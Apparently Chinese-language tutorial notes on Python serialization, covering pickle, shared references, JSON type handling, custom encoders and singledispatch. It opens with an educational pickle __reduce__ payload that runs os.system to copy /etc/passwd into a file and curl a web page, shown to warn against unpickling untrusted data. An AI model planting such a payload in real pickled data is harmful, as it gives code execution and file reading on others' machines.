pickling
pickling on UNIX
重要!unpickle 可執行程式,有資安風險。不要 unpickling 不是你自己 pickling 的資料。
import os
import pickle
class Exploit:
    """Demonstrate why unpickling data you did not pickle yourself is unsafe.

    WARNING: educational payload. ``__reduce__`` tells pickle to call
    ``os.system`` with the shell command below when an instance is loaded.
    """

    def __reduce__(self):
        """Return the ``(callable, args)`` pair that pickle stores for this object."""
        # cat [-u] [-s] [-v [-t] [-e]] file: used here to read /etc/passwd and
        # redirect its contents into exploit.txt.
        # curl [options] [URL...]: used here to fetch www.google.com and append
        # the response to the same exploit.txt.
        shell_command = "cat /etc/passwd > exploit.txt && curl www.google.com >> exploit.txt"
        call_args = (shell_command,)
        return os.system, call_args
def serialize_exploit(fname):
    """Pickle a new ``Exploit`` instance into the file named *fname*.

    The file is opened in binary write mode ('wb') because pickle emits bytes.
    """
    with open(fname, mode='wb') as sink:
        pickle.Pickler(sink).dump(Exploit())
serialize_exploit('loadme')
# WARNING: loading this pickle executes the shell command embedded by Exploit.
# Open in binary read mode ('rb') inside a `with` block so the file handle is
# closed once loading finishes instead of being leaked.
with open('loadme', 'rb') as f:
    pickle.load(f)
然後觀察該路徑(/etc/passwd)的相關檔案變化,以及檔案內容(exploit.txt,基本上就是上方程式中註解說明的:/etc/passwd 路徑內容,加上 google 首頁資料)。
上述程式僅支援 UNIX 與 macOS 等類 UNIX 系統,不支援 MS-Windows。
Pickling Dictionaries
import pickle
ser = pickle.dumps('Python Pickled Peppers')
ser
# b'\x80\x04\x95\x1a\x00\x00\x00\x00\x00\x00\x00\x8c\x16Python Pickled Peppers\x94.'
deser = pickle.loads(ser)
deser
# 'Python Pickled Peppers'
# 精簡過,非完整原始碼。
# 先指定 d = 原始資料,再令 ser = pickle.dumps(d)、deser = pickle.loads(ser),藉此來展示 is(identity)和 ==(equality)
d is deser, d == deser
# (False, True)
# 接著展示不同資料型態的執行結果
# ser = pickle.dumps(3.14) # float
# ser = pickle.dumps([10, 20, ('a', 'b', 30)]) # list
# s = {'a', 'b', 'x', 10} # set
# ser = pickle.dumps({'b': 1, 'a': 2, 'c': {'x': 10, 'y': 20}}) # dictionary
如果要 pickle 的 dictionary,其中部分值是參考另一個 dictionary 呢?
d1 = {'a': 10, 'b': 20}
d2 = {'x': 100, 'y': d1, 'z': d1}
ser = pickle.dumps(d2)
d3 = pickle.loads(ser)
d3['y'] == d2['y']
# True
d3['y'] is d2['y']
# False
接著看如果資料來源是同一個(上述 d1)時,pickling 不會再做一次,而是指向同一個物件(類似 deepcopy 的行為模式)。
不只是 dictionary,lists, sets 和 tuples 也一樣。
d2['y'] is d2['z']
# True
d3['y'] == d3['z']
# True
# Equality alone does not show that the reference is shared; the identity
# check confirms pickle restored 'y' and 'z' as one and the same object.
d3['y'] is d3['z']
# True
上述行為,在我們使用 serialization / deserialization 時要特別小心。因為參考同一個 object,serialization / deserialization 後的值,會是原來的參考值。
對照一:沒有用 serialization 時,行為符合我們預期
d1 = {'a': 1, 'b': 2}
d2 = {'x': 10, 'y': d1}
print(d1)
# {'a': 1, 'b': 2}
print(d2)
# {'x': 10, 'y': {'a': 1, 'b': 2}}
d1['c'] = 3
print(d1)
# {'a': 1, 'b': 2, 'c': 3}
print(d2)
# {'x': 10, 'y': {'a': 1, 'b': 2, 'c': 3}}
對照二:使用 serialization 時。下次程式執行時,d2 的值,對照到原先的 d1(沒有 ‘c’: 3),而不是新的。
d1 = {'a': 1, 'b': 2}
d2 = {'x': 10, 'y': d1}
d1_ser = pickle.dumps(d1)
d2_ser = pickle.dumps(d2)
# simulate exiting the program, or maybe just restarting the notebook
del d1
del d2
# load the data back up
d1 = pickle.loads(d1_ser)
d2 = pickle.loads(d2_ser)
# and continue processing as before
print(d1)
# {'a': 1, 'b': 2}
print(d2)
# {'x': 10, 'y': {'a': 1, 'b': 2}}
d1['c'] = 3
print(d1)
# {'a': 1, 'b': 2, 'c': 3}
print(d2)
# {'x': 10, 'y': {'a': 1, 'b': 2}} # 這裡沒有 'c': 3
最後用老範例(class Person),再驗證一次上述行為。
The pickle module is relatively intelligent and will not re-pickle an object it has already pickled - which means that relative references are preserved.
__
JSON Serialization
基本操作
import json # 注意!本例下方的範例程式,已省略本 import
# serialization
d1 = {'a': 100, 'b': 200}
d1_json = json.dumps(d1)
d1_json, type(d1_json)
# ('{"a": 100, "b": 200}', str)
# deserialization
d2 = json.loads(d1_json)
d2, type(d2)
# ({'a': 100, 'b': 200}, dict)
# equality checking
d1 == d2
# True
提醒:d1 serialization 前後的不同。 {‘a’: 100, ‘b’: 200} vs ‘{“a”: 100, “b”: 200}’
我們可以在 print 中,設定 json.dumps 的參數,讓顯示美觀些。
print(json.dumps(d1, indent=2))
輸出:
{
"a": 100,
"b": 200
}
注意資料型態
Python 的 key,只要是 hashable 即可。但 JSON 的 key,必須是 string。
先來看看當 Python 的 key 是整數時,程式執行過程。
d1 = {1: 100, 2: 200}
d1_json = json.dumps(d1)
d1_json
# '{"1": 100, "2": 200}' # from 1 to "1"
d2 = json.loads(d1_json)
print(d1)
# {1: 100, 2: 200}
print(d2)
# {'1': 100, '2': 200}
注意:上方的程式顯示,Python 將 key 整數,轉換為 string。1 變 “1”、2 變 “2”。
所以 d == loads(dumps(d)) 不成立。
接著看一下,Python 中的一個長字串(內容是 JSON),在做過 serialization / deserialization 後的結果。
d_json = '''
{
"name": "John Cleese",
"age": 82,
"height": 1.96,
"walksFunny": true,
"sketches": [
{
"title": "Dead Parrot",
"costars": ["Michael Palin"]
},
{
"title": "Ministry of Silly Walks",
"costars": ["Michael Palin", "Terry Jones"]
}
],
"boring": null
}
'''
# deserialize this JSON string
d = json.loads(d_json)
print(d)
# {'name': 'John Cleese', 'age': 82, 'height': 1.96,... 過長,恕刪
d
{'name': 'John Cleese',
'age': 82,
'height': 1.96,
'walksFunny': True, # 原本是 true
'sketches': [{'title': 'Dead Parrot', 'costars': ['Michael Palin']},
{'title': 'Ministry of Silly Walks',
'costars': ['Michael Palin', 'Terry Jones']}],
'boring': None} # 原本是 null
注意:serialization / deserialization 後,JSON object不保證 key 的順序相同。
接著檢查 serialization / deserialization 後的資料型態。
print(d['age'], type(d['age']))
print(d['height'], type(d['height']))
print(d['boring'], type(d['boring']))
print(d['sketches'], type(d['sketches']))
print(d['walksFunny'], type(d['walksFunny']))
print(d['sketches'][0], type(d['sketches'][0]))
輸出:
82 <class 'int'>
1.96 <class 'float'>
None <class 'NoneType'>
[{'title': 'Dead Parrot', 'costars': ['Michael Palin']}, {'title': 'Ministry of Silly Walks', 'costars': ['Michael Palin', 'Terry Jones']}] <class 'list'>
True <class 'bool'>
{'title': 'Dead Parrot', 'costars': ['Michael Palin']} <class 'dict'>
As you can see, the JSON
array was deserialized into a list,
true was deserialized into a bool,
integer-looking values into int,
float-looking values into float, and
sub-objects into dict.
As you can see deserializing JSON objects into Python is very straightforward and intuitive.
tuples serializing
d = {'a': (1, 2, 3)}
json.dumps(d)
# '{"a": [1, 2, 3]}'
Python tuples are serialized into JSON lists
bad_json = '''
{"a": (1, 2, 3)}
'''
json.loads(bad_json)
# JSONDecodeError # 這個錯誤提示不是太明顯
Python was able to serialize a tuple by making it into a JSON array
How about other data types: Decimals, Fractions, Complex Numbers, Sets, etc
Decimals
from decimal import Decimal
json.dumps({'a': Decimal('0.5')})
# TypeError
Complex
try:
json.dumps({"a": 1+1j})
except TypeError as ex:
print(ex)
# Object of type 'complex' is not JSON serializable
Set
try:
json.dumps({"a": {1, 2, 3}})
except TypeError as ex:
print(ex)
# Object of type 'set' is not JSON serializable
Now we could get around that problem by looking at the string representation of those objects:
# Build the Decimal from a string (as in the Decimal('0.5') example earlier):
# constructing it from a float literal would carry over the binary
# floating-point approximation for values that are not exactly representable.
str(Decimal('0.5'))
# '0.5'
json.dumps({"a": str(Decimal('0.5'))})
# '{"a": "0.5"}'
Own objects
class Person:
    """Plain object holding a name and an age; it defines no JSON conversion."""

    def __init__(self, name, age):
        """Store *name* and *age* as instance attributes."""
        self.name, self.age = name, age

    def __repr__(self):
        """Return ``Person(name=<name>, age=<age>)`` for the current attributes."""
        return 'Person(name={}, age={})'.format(self.name, self.age)
p = Person('John', 82)
p
# Person(name=John, age=82)
json.dumps({"john": p})
# TypeError
Solution: write a custom JSON serializer in our class itself, and use that when we serialize the object
class Person:
    """Person record that can describe itself as a JSON-friendly dict."""

    def __init__(self, name, age):
        """Store *name* and *age* as instance attributes."""
        self.name, self.age = name, age

    def __repr__(self):
        """Return ``Person(name=<name>, age=<age>)`` for the current attributes."""
        return 'Person(name={}, age={})'.format(self.name, self.age)

    def toJSON(self):
        """Return a dict with the ``name`` and ``age`` of this person."""
        return {'name': self.name, 'age': self.age}
p = Person('John', 82)
p.toJSON()
# {'name': 'John', 'age': 82}
print(json.dumps({"john": p.toJSON()}, indent=2))
輸出:
{
"john": {
"name": "John",
"age": 82
}
}
We can make our life a little easier by using the
`vars` function (or the `__dict__` attribute) to return a dictionary of our object's attributes.
vars(p) # vars function
# {'name': 'John', 'age': 82}
p.__dict__
# {'name': 'John', 'age': 82}
class Person:
    """Person record whose ``toJSON`` is derived from its instance attributes."""

    def __init__(self, name, age):
        """Store *name* and *age* as instance attributes."""
        self.name = name
        self.age = age

    def __repr__(self):
        """Return ``Person(name=<name>, age=<age>)`` for the current attributes."""
        return f'Person(name={self.name}, age={self.age})'

    def toJSON(self):
        """Return the instance attributes as a new dict.

        Produces the same content as ``dict(name=self.name, age=self.age)``
        without listing each attribute by hand.
        """
        # vars(self) is the live attribute dict of the instance; copy it so a
        # caller that modifies the result cannot change the object itself.
        return dict(vars(self))
json.dumps(dict(john=p.toJSON()))
# '{"john": {"name": "John", "age": 82}}'
dealing with sets, where we do not control the class definition
s = {1, 2, 3}
json.dumps(dict(a=list({1, 2, 3})))
# '{"a": [1, 2, 3]}'
問題:
- we have to remember to call `.toJSON()` for our custom objects
- what about built-in or standard types like sets, or dates? Do we use built-in functions or write custom ones to convert them, and then call them every time?
Custom JSON Serialization
datetime
from datetime import datetime
import json
current = datetime.utcnow()
# datetime.datetime(2022, 12, 20, 11, 37, 44, 408640)
json.dumps(current)
# TypeError
Python raises a
`TypeError` exception, stating that `datetime` objects are not JSON serializable.
from datetime import datetime
import json
def format_iso(dt):
    """Format *dt* as ``YYYY-MM-DDTHH:MM:SS`` using its ``strftime`` method.

    The pattern has no fractional-seconds field, so microseconds do not
    appear in the result.
    """
    pattern = '%Y-%m-%dT%H:%M:%S'
    return dt.strftime(pattern)
format_iso(current)
# '2022-12-20T11:37:44'
current.isoformat()
# '2022-12-20T11:37:44.408640'
log_record = {'time': datetime.utcnow().isoformat(), 'message': 'testing'}
json.dumps(log_record)
# {"time": "2022-12-20T11:42:02.394702", "message": "testing"}
This works, but it is far from ideal. Normally, our dictionary will contain the
`datetime` object, not its string representation. What we have to do is write custom code to replace non-JSON-serializable objects in our dictionary with custom representations.
The simplest way is to specify a function that
`dump`/`dumps` will call when it encounters something it cannot serialize.
def format_iso(dt):
    """Return ``dt.isoformat()``.

    Only objects that provide an ``isoformat`` method are handled; anything
    else raises ``AttributeError`` from the attribute lookup.
    """
    iso_text = dt.isoformat()
    return iso_text
json.dumps(log_record, default=format_iso)
# {"time": "2022-12-20T11:43:12.487649", "message": "testing"}
log_record = {
'time': datetime.utcnow(),
'message': 'Testing...',
'other': {'a', 'b', 'c'} # set尚未處理
}
json.dumps(log_record, default=format_iso)
# AttributeError
if else 判斷式,一個一個加上待處理的資料型態
def custom_json_formatter(arg):
    """Convert an object the JSON encoder cannot handle into an encodable value.

    Written for use as the ``default=`` callback of ``json.dump`` /
    ``json.dumps``.

    Args:
        arg: The object that could not be serialized.

    Returns:
        The ``isoformat()`` string for ``datetime`` instances, or a list of
        the members for ``set`` instances.

    Raises:
        TypeError: If *arg* is neither a ``datetime`` nor a ``set``.
    """
    if isinstance(arg, datetime):
        return arg.isoformat()
    if isinstance(arg, set):
        return list(arg)
    # Falling off the end would return None, which json.dumps encodes as
    # null without complaint; raise so unsupported data is never lost silently.
    raise TypeError(
        f'Object of type {type(arg).__name__} is not JSON serializable'
    )
接著以萬年範例 class Person 做示範
程式碼略(原理都相同,只是換用 custom object 示範)
class Person 中的 datetime 因為已處理,不用再處理一次。
toJSON method
class Person:
    """Person record that also remembers when it was created."""

    def __init__(self, name, age):
        """Store *name* and *age* and stamp the instance with the current UTC time."""
        self.name = name
        self.age = age
        # Naive UTC timestamp captured at construction time.
        self.create_dt = datetime.utcnow()

    def __repr__(self):
        """Return ``Person(name=<name>, age=<age>)``; ``create_dt`` is not shown."""
        return f'Person(name={self.name}, age={self.age})'

    def toJSON(self):
        """Return the instance attributes (name, age, create_dt) as a new dict.

        ``create_dt`` is returned as a ``datetime`` object, not a string, so
        the JSON encoder still needs a formatter that handles ``datetime``.
        """
        # Same content as listing 'name', 'age' and 'create_dt' by hand.
        # vars(self) is the live attribute dict; copy it so a caller that
        # modifies the result cannot change the object itself.
        return dict(vars(self))
用一個較通用的方式,來處理更多不同的資料型態。
def custom_json_formatter(arg):
    """Turn *arg* into something the JSON encoder can serialize.

    Conversions are tried in this order:

    1. ``datetime`` -> ``arg.isoformat()``
    2. ``set`` -> ``list(arg)``
    3. any object with a ``toJSON`` method -> ``arg.toJSON()``
    4. any object accepted by ``vars`` -> ``vars(arg)``
    5. everything else -> ``str(arg)``
    """
    if isinstance(arg, datetime):
        return arg.isoformat()
    if isinstance(arg, set):
        return list(arg)

    try:
        return arg.toJSON()
    except AttributeError:
        # No usable toJSON; fall through to the attribute-dict attempt.
        pass

    try:
        return vars(arg)
    except TypeError:
        # vars() rejected the object; use its string form as the last resort.
        return str(arg)
singledispatch
re-write our custom json formatter using the generic single dispatch decorator.
from functools import singledispatch
@singledispatch
def json_format(arg):
    """Generic fallback used when no type-specific overload is registered.

    Prints *arg* and a trace line for each attempt, then returns the first
    of ``arg.toJSON()``, ``vars(arg)`` or ``str(arg)`` that works.
    """
    print(arg)

    try:
        print('\ttrying to use toJSON...')
        return arg.toJSON()
    except AttributeError:
        print('\tfailed - trying to use vars...')

    try:
        return vars(arg)
    except TypeError:
        print('\tfailed - using string representation...')

    return str(arg)
然後再一一 register 不同的資料型態。
@json_format.register
def _(arg: datetime):
    """Overload for ``datetime``: return ``arg.isoformat()``."""
    return arg.isoformat()


@json_format.register
def _(arg: set):
    """Overload for ``set``: return the members as a list."""
    return list(arg)
最後用之前的 class Person 再示範一次。
class Person:
    """Person record whose ``toJSON`` exposes only the name."""

    def __init__(self, name, age):
        """Store *name* and *age* and stamp the instance with the current UTC time."""
        self.name, self.age = name, age
        self.create_dt = datetime.utcnow()

    def __repr__(self):
        """Return ``Person(name=<name>, age=<age>)``; ``create_dt`` is not shown."""
        return 'Person(name={}, age={})'.format(self.name, self.age)

    def toJSON(self):
        """Return a dict containing only the ``name`` attribute."""
        # For comparison, the alternatives shown earlier:
        #   option 1: return {'name': self.name, 'age': self.age,
        #                     'create_dt': self.create_dt}
        #   option 2: return vars(self)
        return {'name': self.name}
Custom JSON Encoding using JSONEncoder
JSONEncoder
Encodes the “standard” types, such as
`str`, `int`, `float`, `list`, `dict`, etc.
| Python | JSON |
|---|---|
| dict | object {…} |
| list, tuple | array […] |
| str | string … |
| int, float | number |
| int or float Enums | number |
| bool | true or false |
| None | null |
TypeError exception
non-supported objects
We can actually extend this
`JSONEncoder` class and override the `default` method.
import json
from datetime import datetime
class CustomJSONEncoder(json.JSONEncoder):
    """JSON encoder that additionally knows how to serialize ``datetime``."""

    def default(self, arg):
        """Return a JSON-encodable replacement for *arg*.

        Args:
            arg: An object the standard encoder could not serialize.

        Returns:
            ``arg.isoformat()`` for ``datetime`` instances; otherwise
            whatever the next ``default`` in the class hierarchy returns.

        Raises:
            TypeError: Raised by the base ``JSONEncoder.default`` when no
                class in the hierarchy can handle *arg*.
        """
        if isinstance(arg, datetime):
            return arg.isoformat()
        # Return the delegated result: without `return`, a cooperating base
        # encoder's value would be discarded and None (JSON null) emitted.
        return super().default(arg)